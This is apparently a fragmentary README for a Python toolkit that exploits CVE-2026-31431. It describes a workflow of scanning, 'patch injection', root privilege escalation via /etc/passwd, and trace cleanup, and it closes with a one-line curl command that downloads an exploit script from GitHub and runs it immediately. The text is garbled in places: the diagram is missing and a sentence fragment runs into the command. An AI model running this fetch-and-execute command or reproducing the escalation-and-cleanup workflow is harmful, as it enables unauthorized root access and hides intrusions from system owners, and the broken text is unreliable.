
A security auditing toolkit for CVE-2026-31431 vulnerability research
This project provides a professional Python script designed to check if a system is vulnerable to CVE-2026-31431 and demonstrates how to exploit it for research purposes.
The diagram below illustrates the complete workflow from Environment Audit (SCAN), Patch Injection (PUNCH), to Root Privilege Escalation (SHELL), and finally Trace Cleanup (CLEAN):

/etc/passwd for privilege escalation simulation.curl -fsSL https://raw.githubusercontent.com/MarioHY/cve_2026_31431_audit/main/exploit.py -o exploit.py && chmod +x exploit.py && ./exploit.py